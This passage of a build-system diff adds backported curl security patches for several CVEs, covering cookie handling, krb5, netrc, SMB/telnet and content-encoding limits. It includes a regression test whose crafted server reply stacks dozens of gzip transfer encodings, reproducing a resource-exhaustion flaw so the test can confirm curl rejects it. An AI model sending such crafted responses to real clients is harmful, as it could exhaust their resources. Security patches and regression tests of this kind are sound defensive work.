++ if(++counter >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to %u content encodings",
++ counter);
++ return CURLE_BAD_CONTENT_ENCODING;
++ }
+ /* Stack the unencoding stage. */
+ writer = new_unencoding_writer(conn, encoding, k->writer_stack);
+ if(!writer)
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32207.patch b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
new file mode 100644
index 0000000000..f75aaecd64
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
@@ -0,0 +1,284 @@
+From af92181055d7d64dfc0bc9d5a13c8b98af3196be Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 25 May 2022 10:09:53 +0200
+Subject: [PATCH] fopen: add Curl_fopen() for better overwriting of files
+
+Bug: https://curl.se/docs/CVE-2022-32207.html
+CVE-2022-32207
+Reported-by: Harry Sintonen
+Closes #9050
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/20f9dd6bae50b]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ CMakeLists.txt | 1 +
+ configure.ac | 1 +
+ lib/Makefile.inc | 4 +-
+ lib/cookie.c | 19 ++-----
+ lib/curl_config.h.cmake | 3 ++
+ lib/fopen.c | 113 ++++++++++++++++++++++++++++++++++++++++
+ lib/fopen.h | 30 +++++++++++
+ 7 files changed, 155 insertions(+), 16 deletions(-)
+ create mode 100644 lib/fopen.c
+ create mode 100644 lib/fopen.h
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 73b053b..cc587b0 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -869,6 +869,7 @@ elseif(HAVE_LIBSOCKET)
+ set(CMAKE_REQUIRED_LIBRARIES socket)
+ endif()
+
++check_symbol_exists(fchmod "${CURL_INCLUDES}" HAVE_FCHMOD)
+ check_symbol_exists(basename "${CURL_INCLUDES}" HAVE_BASENAME)
+ check_symbol_exists(socket "${CURL_INCLUDES}" HAVE_SOCKET)
+ check_symbol_exists(select "${CURL_INCLUDES}" HAVE_SELECT)
+diff --git a/configure.ac b/configure.ac
+index d090622..7071077 100755
+--- a/configure.ac
++++ b/configure.ac
+@@ -4059,6 +4059,7 @@ AC_CHECK_DECLS([getpwuid_r], [], [AC_DEFINE(HAVE_DECL_GETPWUID_R_MISSING, 1, "Se
+
+
+ AC_CHECK_FUNCS([fnmatch \
++ fchmod \
+ geteuid \
+ getpass_r \
+ getppid \
+diff --git a/lib/Makefile.inc b/lib/Makefile.inc
+index 46ded90..79307d8 100644
+--- a/lib/Makefile.inc
++++ b/lib/Makefile.inc
+@@ -63,7 +63,7 @@ LIB_CFILES = file.c timeval.c base64.c hostip.c progress.c formdata.c \
+ curl_multibyte.c hostcheck.c conncache.c dotdot.c \
+ x509asn1.c http2.c smb.c curl_endian.c curl_des.c system_win32.c \
+ mime.c sha256.c setopt.c curl_path.c curl_ctype.c curl_range.c psl.c \
+- doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c
++ doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c fopen.c
+
+ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+ formdata.h cookie.h http.h sendf.h ftp.h url.h dict.h if2ip.h \
+@@ -84,7 +84,7 @@ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+ x509asn1.h http2.h sigpipe.h smb.h curl_endian.h curl_des.h \
+ curl_printf.h system_win32.h rand.h mime.h curl_sha256.h setopt.h \
+ curl_path.h curl_ctype.h curl_range.h psl.h doh.h urlapi-int.h \
+- curl_get_line.h altsvc.h quic.h socketpair.h rename.h
++ curl_get_line.h altsvc.h quic.h socketpair.h rename.h fopen.h
+
+ LIB_RCFILES = libcurl.rc
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1..a9ad20a 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -97,8 +97,8 @@ Example set of cookies:
+ #include "curl_memrchr.h"
+ #include "inet_pton.h"
+ #include "parsedate.h"
+-#include "rand.h"
+ #include "rename.h"
++#include "fopen.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -1524,18 +1524,9 @@ static int cookie_output(struct Curl_easy *data,
+ use_stdout = TRUE;
+ }
+ else {
+- unsigned char randsuffix[9];
+-
+- if(Curl_rand_hex(data, randsuffix, sizeof(randsuffix)))
+- return 2;
+-
+- tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
+- if(!tempstore)
+- return 1;
+-
+- out = fopen(tempstore, FOPEN_WRITETEXT);
+- if(!out)
+- goto error;
++ error = Curl_fopen(data, filename, &out, &tempstore);
++ if(error)
++ goto error;
+ }
+
+ fputs("# Netscape HTTP Cookie File\n"
+@@ -1581,7 +1572,7 @@ static int cookie_output(struct Curl_easy *data,
+ if(!use_stdout) {
+ fclose(out);
+ out = NULL;
+- if(Curl_rename(tempstore, filename)) {
++ if(tempstore && Curl_rename(tempstore, filename)) {
+ unlink(tempstore);
+ goto error;
+ }
+diff --git a/lib/curl_config.h.cmake b/lib/curl_config.h.cmake
+index 98cdf51..fe43751 100644
+--- a/lib/curl_config.h.cmake
++++ b/lib/curl_config.h.cmake
+@@ -124,6 +124,9 @@
+ /* Define to 1 if you have the <assert.h> header file. */
+ #cmakedefine HAVE_ASSERT_H 1
+
++/* Define to 1 if you have the `fchmod' function. */
++#cmakedefine HAVE_FCHMOD 1
++
+ /* Define to 1 if you have the `basename' function. */
+ #cmakedefine HAVE_BASENAME 1
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+new file mode 100644
+index 0000000..ad3691b
+--- /dev/null
++++ b/lib/fopen.c
+@@ -0,0 +1,113 @@
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#if !defined(CURL_DISABLE_COOKIES) || !defined(CURL_DISABLE_ALTSVC) || \
++ !defined(CURL_DISABLE_HSTS)
++
++#ifdef HAVE_FCNTL_H
++#include <fcntl.h>
++#endif
++
++#include "urldata.h"
++#include "rand.h"
++#include "fopen.h"
++/* The last 3 #include files should be in this order */
++#include "curl_printf.h"
++#include "curl_memory.h"
++#include "memdebug.h"
++
++/*
++ * Curl_fopen() opens a file for writing with a temp name, to be renamed
++ * to the final name when completed. If there is an existing file using this
++ * name at the time of the open, this function will clone the mode from that
++ * file. if 'tempname' is non-NULL, it needs a rename after the file is
++ * written.
++ */
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++ FILE **fh, char **tempname)
++{
++ CURLcode result = CURLE_WRITE_ERROR;
++ unsigned char randsuffix[9];
++ char *tempstore = NULL;
++ struct_stat sb;
++ int fd = -1;
++ *tempname = NULL;
++
++ if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
++ /* a non-regular file, fallback to direct fopen() */
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(*fh)
++ return CURLE_OK;
++ goto fail;
++ }
++
++ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
++ if(result)
++ goto fail;
++
++ tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
++ if(!tempstore) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto fail;
++ }
++
++ result = CURLE_WRITE_ERROR;
++ fd = open(tempstore, O_WRONLY | O_CREAT | O_EXCL, 0600);
++ if(fd == -1)
++ goto fail;
++
++#ifdef HAVE_FCHMOD
++ {
++ struct_stat nsb;
++ if((fstat(fd, &nsb) != -1) &&
++ (nsb.st_uid == sb.st_uid) && (nsb.st_gid == sb.st_gid)) {
++ /* if the user and group are the same, clone the original mode */
++ if(fchmod(fd, sb.st_mode) == -1)
++ goto fail;
++ }
++ }
++#endif
++
++ *fh = fdopen(fd, FOPEN_WRITETEXT);
++ if(!*fh)
++ goto fail;
++
++ *tempname = tempstore;
++ return CURLE_OK;
++
++fail:
++ if(fd != -1) {
++ close(fd);
++ unlink(tempstore);
++ }
++
++ free(tempstore);
++
++ *tempname = NULL;
++ return result;
++}
++
++#endif /* ! disabled */
+diff --git a/lib/fopen.h b/lib/fopen.h
+new file mode 100644
+index 0000000..289e55f
+--- /dev/null
++++ b/lib/fopen.h
+@@ -0,0 +1,30 @@
++#ifndef HEADER_CURL_FOPEN_H
++#define HEADER_CURL_FOPEN_H
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++ FILE **fh, char **tempname);
++
++#endif
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32208.patch b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
new file mode 100644
index 0000000000..2939314d09
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
@@ -0,0 +1,72 @@
+From 3b90f0b2a7a84645acce151c86b40d25b5de6615 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Jun 2022 09:27:24 +0200
+Subject: [PATCH] krb5: return error properly on decode errors
+
+Bug: https://curl.se/docs/CVE-2022-32208.html
+CVE-2022-32208
+Reported-by: Harry Sintonen
+Closes #9051
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6ecdf5136b52af7]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/krb5.c | 5 +----
+ lib/security.c | 13 ++++++++++---
+ 2 files changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/lib/krb5.c b/lib/krb5.c
+index f50287a..5b77e35 100644
+--- a/lib/krb5.c
++++ b/lib/krb5.c
+@@ -86,11 +86,8 @@ krb5_decode(void *app_data, void *buf, int len,
+ enc.value = buf;
+ enc.length = len;
+ maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);
+- if(maj != GSS_S_COMPLETE) {
+- if(len >= 4)
+- strcpy(buf, "599 ");
++ if(maj != GSS_S_COMPLETE)
+ return -1;
+- }
+
+ memcpy(buf, dec.value, dec.length);
+ len = curlx_uztosi(dec.length);
+diff --git a/lib/security.c b/lib/security.c
+index fbfa707..3542210 100644
+--- a/lib/security.c
++++ b/lib/security.c
+@@ -192,6 +192,7 @@ static CURLcode read_data(struct connectdata *conn,
+ {
+ int len;
+ CURLcode result;
++ int nread;
+
+ result = socket_read(fd, &len, sizeof(len));
+ if(result)
+@@ -200,7 +201,10 @@ static CURLcode read_data(struct connectdata *conn,
+ if(len) {
+ /* only realloc if there was a length */
+ len = ntohl(len);
+- buf->data = Curl_saferealloc(buf->data, len);
++ if(len > CURL_MAX_INPUT_LENGTH)
++ len = 0;
++ else
++ buf->data = Curl_saferealloc(buf->data, len);
+ }
+ if(!len || !buf->data)
+ return CURLE_OUT_OF_MEMORY;
+@@ -208,8 +212,11 @@ static CURLcode read_data(struct connectdata *conn,
+ result = socket_read(fd, buf->data, len);
+ if(result)
+ return result;
+- buf->size = conn->mech->decode(conn->app_data, buf->data, len,
+- conn->data_prot, conn);
++ nread = buf->size = conn->mech->decode(conn->app_data, buf->data, len,
++ conn->data_prot, conn);
++ if(nread < 0)
++ return CURLE_RECV_ERROR;
++ buf->size = (size_t)nread;
+ buf->index = 0;
+ return CURLE_OK;
+ }
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32221.patch b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
new file mode 100644
index 0000000000..8e662abd3a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
@@ -0,0 +1,29 @@
+From 75c04a3e75e8e3025a17ca3033ca307da9691cd0 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 10:49:58 +0530
+Subject: [PATCH] CVE-2022-32221
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/a64e3e59938abd7d6]
+CVE: CVE-2022-32221
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+setopt: when POST is set, reset the 'upload' field.
+---
+ lib/setopt.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index bebb2e4..4d96f6b 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -486,6 +486,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
++ data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35252.patch b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
new file mode 100644
index 0000000000..a5160c01f4
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
@@ -0,0 +1,72 @@
+From c9212bdb21f0cc90a1a60dfdbb716deefe78fd40 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 29 Aug 2022 00:09:17 +0200
+Subject: [PATCH] cookie: reject cookies with "control bytes"
+
+Rejects 0x01 - 0x1f (except 0x09) plus 0x7f
+
+Reported-by: Axel Chong
+
+Bug: https://curl.se/docs/CVE-2022-35252.html
+
+CVE-2022-35252
+
+Closes #9381
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/8dfc93e573ca740544a2d79ebb]
+
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/cookie.c | 29 +++++++++++++++++++++++++++++
+ 1 file changed, 29 insertions(+)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index a9ad20a..66c7715 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -412,6 +412,30 @@ static bool bad_domain(const char *domain)
+ return !strchr(domain, '.') && !strcasecompare(domain, "localhost");
+ }
+
++/*
++ RFC 6265 section 4.1.1 says a server should accept this range:
++
++ cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
++
++ But Firefox and Chrome as of June 2022 accept space, comma and double-quotes
++ fine. The prime reason for filtering out control bytes is that some HTTP
++ servers return 400 for requests that contain such.
++*/
++static int invalid_octets(const char *p)
++{
++ /* Reject all bytes \x01 - \x1f (*except* \x09, TAB) + \x7f */
++ static const char badoctets[] = {
++ "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
++ "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
++ "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f"
++ };
++ size_t vlen, len;
++ /* scan for all the octets that are *not* in cookie-octet */
++ len = strcspn(p, badoctets);
++ vlen = strlen(p);
++ return (len != vlen);
++}
++
+ /****************************************************************************
+ *
+ * Curl_cookie_add()
+@@ -558,6 +582,11 @@ Curl_cookie_add(struct Curl_easy *data,
+ badcookie = TRUE;
+ break;
+ }
++ if(invalid_octets(whatptr) || invalid_octets(name)) {
++ infof(data, "invalid octets in name/value, cookie dropped");
++ badcookie = TRUE;
++ break;
++ }
+ }
+ else if(!len) {
+ /* this was a "<name>=" with no content, and we must allow
+--
+2.35.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35260.patch b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
new file mode 100644
index 0000000000..476c996b0a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
@@ -0,0 +1,68 @@
+From 3ff3989ec53d9ddcf4bdd99f5d5788dd87486768 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 4 Oct 2022 14:37:24 +0200
+Subject: [PATCH] netrc: replace fgets with Curl_get_line
+
+Upstream-Status: Backport
+CVE: CVE-2022-35260
+Reference to upstream patch: https://github.com/curl/curl/commit/c97ec984fb2bc919a3aa863e0476dffa377b184c
+
+Make the parser only accept complete lines and avoid problems with
+overly long lines.
+
+Reported-by: Hiroki Kurosawa
+
+Closes #9789
+---
+ lib/curl_get_line.c | 4 ++--
+ lib/netrc.c | 5 +++--
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/lib/curl_get_line.c b/lib/curl_get_line.c
+index c4194851ae09..4b9eea9e631c 100644
+--- a/lib/curl_get_line.c
++++ b/lib/curl_get_line.c
+@@ -28,8 +28,8 @@
+ #include "memdebug.h"
+
+ /*
+- * get_line() makes sure to only return complete whole lines that fit in 'len'
+- * bytes and end with a newline.
++ * Curl_get_line() makes sure to only return complete whole lines that fit in
++ * 'len' bytes and end with a newline.
+ */
+ char *Curl_get_line(char *buf, int len, FILE *input)
+ {
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 1c9da31993c9..93239132c9d8 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -31,6 +31,7 @@
+ #include "netrc.h"
+ #include "strtok.h"
+ #include "strcase.h"
++#include "curl_get_line.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -83,7 +84,7 @@ static int parsenetrc(const char *host,
+ char netrcbuffer[4096];
+ int netrcbuffsize = (int)sizeof(netrcbuffer);
+
+- while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {
++ while(!done && Curl_get_line(netrcbuffer, netrcbuffsize, file)) {
+ tok = strtok_r(netrcbuffer, " \t\n", &tok_buf);
+ if(tok && *tok == '#')
+ /* treat an initial hash as a comment line */
+@@ -169,7 +170,7 @@ static int parsenetrc(const char *host,
+
+ tok = strtok_r(NULL, " \t\n", &tok_buf);
+ } /* while(tok) */
+- } /* while fgets() */
++ } /* while Curl_get_line() */
+
+ out:
+ if(!retcode) {
+--
+2.34.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-43552.patch b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
new file mode 100644
index 0000000000..d729441454
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
@@ -0,0 +1,82 @@
+rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 19 Dec 2022 08:38:37 +0100
+Subject: [PATCH] smb/telnet: do not free the protocol struct in *_done()
+
+It is managed by the generic layer.
+
+Reported-by: Trail of Bits
+
+Closes #10112
+
+CVE: CVE-2022-43552
+Upstream-Status: Backport [https://github.com/curl/curl/commit/4f20188ac644afe174be6005ef4f6ffba232b8b2]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/smb.c | 14 ++------------
+ lib/telnet.c | 3 ---
+ 2 files changed, 2 insertions(+), 15 deletions(-)
+
+diff --git a/lib/smb.c b/lib/smb.c
+index 12f9925..8db3b27 100644
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -61,8 +61,6 @@ static CURLcode smb_connect(struct connectdata *conn, bool *done);
+ static CURLcode smb_connection_state(struct connectdata *conn, bool *done);
+ static CURLcode smb_do(struct connectdata *conn, bool *done);
+ static CURLcode smb_request_state(struct connectdata *conn, bool *done);
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature);
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead);
+ static int smb_getsock(struct connectdata *conn, curl_socket_t *socks);
+ static CURLcode smb_parse_url_path(struct connectdata *conn);
+@@ -74,7 +72,7 @@ const struct Curl_handler Curl_handler_smb = {
+ "SMB", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -99,7 +97,7 @@ const struct Curl_handler Curl_handler_smbs = {
+ "SMBS", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -919,14 +917,6 @@ static CURLcode smb_request_state(struct connectdata *conn, bool *done)
+ return CURLE_OK;
+ }
+
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature)
+-{
+- (void) premature;
+- Curl_safefree(conn->data->req.protop);
+- return status;
+-}
+-
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead)
+ {
+ struct smb_conn *smbc = &conn->proto.smbc;
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 3347ad6..e3b9208 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -1294,9 +1294,6 @@ static CURLcode telnet_done(struct connectdata *conn,
+
+ curl_slist_free_all(tn->telnet_vars);
+ tn->telnet_vars = NULL;
+-
+- Curl_safefree(conn->data->req.protop);
+-
+ return CURLE_OK;
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-23916.patch b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
new file mode 100644
index 0000000000..054615963e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
@@ -0,0 +1,231 @@
+From 119fb187192a9ea13dc90d9d20c215fc82799ab9 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 13 Feb 2023 08:33:09 +0100
+Subject: [PATCH] content_encoding: do not reset stage counter for each header
+
+Test 418 verifies
+
+Closes #10492
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/119fb187192a9ea13dc90d9d20c215fc82799ab9]
+CVE: CVE-2023-23916
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/content_encoding.c | 7 +-
+ lib/urldata.h | 1 +
+ tests/data/Makefile.inc | 2 +-
+ tests/data/test418 | 152 ++++++++++++++++++++++++++++++++++++++++
+ 4 files changed, 157 insertions(+), 5 deletions(-)
+ create mode 100644 tests/data/test418
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 91e621f..7e098a5 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -944,7 +944,6 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
+- int counter = 0;
+
+ do {
+ const char *name;
+@@ -979,9 +978,9 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
+- if(++counter >= MAX_ENCODE_STACK) {
+- failf(data, "Reject response due to %u content encodings",
+- counter);
++ if(k->writer_stack_depth++ >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to more than %u content encodings",
++ MAX_ENCODE_STACK);
+ return CURLE_BAD_CONTENT_ENCODING;
+ }
+ /* Stack the unencoding stage. */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ad0ef8f..168f874 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -648,6 +648,7 @@ struct SingleRequest {
+ #ifndef CURL_DISABLE_DOH
+ struct dohdata doh; /* DoH specific data for this request */
+ #endif
++ unsigned char writer_stack_depth; /* Unencoding stack depth. */
+ BIT(header); /* incoming data has HTTP header */
+ BIT(content_range); /* set TRUE if Content-Range: was found */
+ BIT(upload_done); /* set to TRUE when doing chunked transfer-encoding
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 60e8176..40de8bc 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -63,7 +63,7 @@ test350 test351 test352 test353 test354 test355 test356 test357 \
+ test393 test394 test395 \
+ \
+ test400 test401 test402 test403 test404 test405 test406 test407 test408 \
+-test409 \
++test409 test418 \
+ \
+ test490 test491 test492 \
+ \
+diff --git a/tests/data/test418 b/tests/data/test418
+new file mode 100644
+index 0000000..50e974e
+--- /dev/null
++++ b/tests/data/test418
+@@ -0,0 +1,152 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++gzip
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<data nocheck="yes">
++HTTP/1.1 200 OK
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++
++-foo-
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<server>
++http
++</server>
++ <name>
++Response with multiple Transfer-Encoding headers
++ </name>
++ <command>
++http://%HOSTIP:%HTTPPORT/%TESTNUMBER -sS
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<protocol crlf="yes">
++GET /%TESTNUMBER HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++User-Agent: curl/%VERSION
++Accept: */*
++
++</protocol>
++
++# CURLE_BAD_CONTENT_ENCODING is 61
++<errorcode>
++61
++</errorcode>
++<stderr mode="text">
++curl: (61) Reject response due to more than 5 content encodings
++</stderr>
++</verify>
++</testcase>
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27533.patch b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
new file mode 100644
index 0000000000..64ba135056
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
@@ -0,0 +1,59 @@
+Backport of:
+
+From 538b1e79a6e7b0bb829ab4cecc828d32105d0684 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 6 Mar 2023 12:07:33 +0100
+Subject: [PATCH] telnet: only accept option arguments in ascii
+
+To avoid embedded telnet negotiation commands etc.
+
